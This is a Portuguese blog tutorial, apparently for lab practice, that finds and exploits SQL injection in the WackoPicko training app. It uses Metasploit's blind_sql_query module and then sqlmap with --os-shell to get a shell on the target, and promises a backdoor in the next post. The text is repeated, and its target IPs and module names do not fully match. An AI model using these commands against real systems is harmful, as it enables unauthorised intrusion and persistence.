Seguindo pessoal com o paper, nesse post vamos ver alguns ataques que podemos fazer ao site com e sem o Metasploit.
Se você quer testar se um parâmetro tem alguma vulnerabilidade de SQL Injection ou não, também podemos testar com o Metasploit. Usarei o módulo auxiliary/scanner/http/blind_qsl_query para este teste.
1. Depois do scan com o plugin WMAP, descobrimos que a url http://10.12.0.2/WackoPicko/website/users/login.php tem uma vulnerabilidade de SQL Injection e tem 2 parâmetros: username e password. Agora vamos testar esse parâmetro com o móduloauxiliary/scanner/http/blind_sql_query module.
2.Especifique o ambiente da página alvo.
3. Inicie o teste.
O resultado é que o parâmetro “username” está mesmo vulnerável a SQL Injection. Temos também outro módulo, que usa a técnica "Error Based" no diretório auxiliary/scanner/http/error_sql_injection.
Já que temos uma vulnerabilidade no parâmetro “username” em users/login.php, podemos usar essa vulnerabilidade para invadir o site com uma tool fora do Metasploit, o SQLMap. O SQLMap é muito famoso e funciona muito bem com o Metasploit.
1. Usaremos 3 flags do sqlmap para este ataque:
2. Agora, vamos rodar o sqlmap com os detalhes que temos. Após o comando, se o usuário usado nessa aplicação tiver privilégios suficientes, você receberá a shell.
E ai está!
Se tudo deu certo, nesse ponto temos a shell do alvo. Paramos por aqui e no próximo post vamos ver como criar um backdoor com o Metasploit para facilitar nosso trabalho de voltar a shell da vítima quando necessário.
SQL Injection com Metasploit
Se você quer testar se um parâmetro tem alguma vulnerabilidade de SQL Injection ou não, também podemos testar com o Metasploit. Usarei o módulo auxiliary/scanner/http/blind_qsl_query para este teste.
1. Depois do scan com o plugin WMAP, descobrimos que a url http://10.12.0.2/WackoPicko/website/users/login.php tem uma vulnerabilidade de SQL Injection e tem 2 parâmetros: username e password. Agora vamos testar esse parâmetro com o móduloauxiliary/scanner/http/blind_sql_query module.
msf > use auxiliary/scanner/http/blind_sql_query
msf auxiliary(blind_sql_query) > show options
2.Especifique o ambiente da página alvo.
msf auxiliary(blind_sql_query) > set DATA username=hacker&password=password&submit=login
msf auxiliary(blind_sql_query) > set METHOD POST
msf auxiliary(blind_sql_query) > set PATH /WackoPicko/users/login.php
msf auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138
3. Inicie o teste.
msf auxiliary(blind_sql_query) > run
O resultado é que o parâmetro “username” está mesmo vulnerável a SQL Injection. Temos também outro módulo, que usa a técnica "Error Based" no diretório auxiliary/scanner/http/error_sql_injection.
Já que temos uma vulnerabilidade no parâmetro “username” em users/login.php, podemos usar essa vulnerabilidade para invadir o site com uma tool fora do Metasploit, o SQLMap. O SQLMap é muito famoso e funciona muito bem com o Metasploit.
1. Usaremos 3 flags do sqlmap para este ataque:
-u URL URL do alvo
-data=DATA String que será mandada através do POST
-random-agent Usar "user agent" aleatóriamente
--os-shell Receber o shell do alvo como resposta da requisição
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.77.138/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell
E ai está!
Se tudo deu certo, nesse ponto temos a shell do alvo. Paramos por aqui e no próximo post vamos ver como criar um backdoor com o Metasploit para facilitar nosso trabalho de voltar a shell da vítima quando necessário.
0 comentários:
Postar um comentário